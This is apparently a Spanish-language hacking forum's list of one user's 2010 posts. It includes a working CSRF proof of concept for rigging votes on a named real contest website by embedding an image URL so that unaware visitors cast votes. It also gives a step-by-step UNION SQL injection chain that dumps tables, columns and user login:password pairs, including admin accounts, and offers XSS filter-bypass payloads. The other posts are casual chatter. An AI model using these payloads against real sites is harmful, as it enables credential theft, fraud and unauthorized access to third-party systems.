Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - cgvwzq

#11
Nivel Web / Re: Hack my site
19 Agosto 2010, 22:40 PM
@averno, valiente sin verguenza... xD Tienes suerte de que no vuelva a entrar, sino nos veriamos las caras! ;)
#12
Nivel Web / Re: [CSRF]Con htaccess??
19 Agosto 2010, 13:22 PM
No es ninguna vulnerabilidad, es simeplemente una característica usada con genio. Puede servir para bypassear un filtro de extensiones o para hacer creer a alguien que se trata de contenido estático cuando en realidad es dinámico.

@tragantras, tu ReDos no tiene nada de ReDos... Simplemente es una manera de floodear via "heavy-queries". Tal vez podrías causar una denegación de servicio, pero en ningún momento estas haciendo un redos.
#13
Seguridad / Re: Ayuda - Burlar pagina de conteo
19 Agosto 2010, 00:28 AM
@Shell Root, por visitar esa url no realizas una votación, tan solo visitas la página. Coje el LiveHeaders y comprueba lo que pasa al votar, o mira el javascript.

@Leo, elige el nombre de una maqueta en la que no hayas votado. Yo por ejemplo voy a usar "strangers-in-the-space", en la siguiente url podemos ver el número de votaciones, la puntuación media y nos permite hacer clic en una estrella y votar (no lo hagas todavía):

http://escucha.universia.net.mx/concurso/escucha-maqueta/strangers-in-the-space

Crea un documento html en tu pc con el siguiente contenido:

<img src="http://escucha.universia.net.mx/concurso/votacion-maqueta/100/strangers-in-the-space"/>

Carga la página y la imagen tratará de cargarse haciendo la votación. Ahora si vas a la primera página y refrescas, habrá cambiado en número de votaciones, la media y si intentas hacer clic en una estrella y votar te avisará de que ya has votado. Así sabemos que el método funciona.

@Leyer, a mi también me saltó esa alerta y pensé que no funcionaría, pero al probarlo y seguir este procedimiento se ve claro que el voto se realiza... :S
#14
Seguridad / Re: Ayuda - Burlar pagina de conteo
19 Agosto 2010, 00:10 AM
El 100 es la valoración máxima. Lo que pasa es que la "maqueta-siguiente", parece que es algo aleatorio...

Un gusto que te sirva! =D
#15
Sacas todas las tablas, y buscas la de los usuarios:

union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()+--+

A esa tabla la llamaremos 'usuarios'. Ahora sacas los campos de la tabla usuarios:

union+select+1,group_concat(column_name),3,4,5+from+information_schema.column+where+table_name='usuarios'+--+

Entre otros campos, tiene el campo 'login' y 'pwd', por ejemplo:

union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+--+

Sacará los usuarios. Si en alguno de los pasos no salen todos, es porque no caben, puedes usar 'limit' y sacarlos uno a uno, o usar este truco.

Si solo quieres el del admin, puedes añadir una cláusula where o ver si hay algún campo en la tabla que represente los privilegios del usuario.

union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+login+like+'%admin%'--+

union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+priv=1+--+

No seas malo...
#16
Seguridad / Re: Ayuda - Burlar pagina de conteo
18 Agosto 2010, 23:24 PM
Yo lo que haría es usar "el poder de la comunidad". Parece que la url para votar una maqueta es la siguiente:

http://escucha.universia.net.mx/concurso/votacion-maqueta/[1-100]/[titulo]

No permite votar una misma maqueta más de una vez al día por IP. Pero no controla el referrer ni usa ningún tipo de token, de modo que con hacer una simple petición GET a esa página se realizará la votación.

Si en cualquier página o en este mismo foro, pones la foto con la url de la canción que quieres votar, todas las personas votarán al ver la página. Aunque solo puedan votar una vez, como cada persona tiene una IP distinta (generalmente) la avalanacha de puntos no se hará esperar...

PoC:
[img alt="noproxy"]http://escucha.universia.net.mx/concurso/votacion-maqueta/100/historia[/img]

Saludos! ^^
#17
Nivel Web / Re: Hack my site
18 Agosto 2010, 22:38 PM
Pufff... Esta hecha un cristo... xD

Solo he ojeado, pero a parte de los tropocientos XSS y CSRF. Hay varias Blind SQLi... Ciertamente no creo que haya ni un solo input vigilado, y además parece que hay algún problema en el control de permisos para poner mensajes en los tablones.

No he explotado los sqli, pero de entrada el usuario corre con más privilegios de los que debería.

Y no documento nada porque me huele a que ese debería ser tu trabajo! ¬¬
#18
Código (javascript) [Seleccionar]
alert(<>wuups</>);
#19
Nivel Web / Re: Bypass de un filtro XSS
21 Julio 2010, 14:04 PM
Si lo que hace es simplemente escapar las comillas simples y dobles (con barra invertida), no tiene mayor dificultad:

" onevent=foo() tr="

"><script>foo()</script><a tr="

Si eso no funciona, es que hace algo más... Si pegas el cacho de html entero, igual lo veo mejor.
#20
Yo hace días que tengo pendiente pasarme por allí, pero estoy en el pueblo y no se cuándo volveré. De todas formas, si en septiembre queréis hacer una quedada los maños del foro me apunto... ^^
Por cierto, los del hacklab zgz buscaban gente para organizar el hackmeeting, así que si alguno esta motivado, ya sabe.

Saludetes!! =D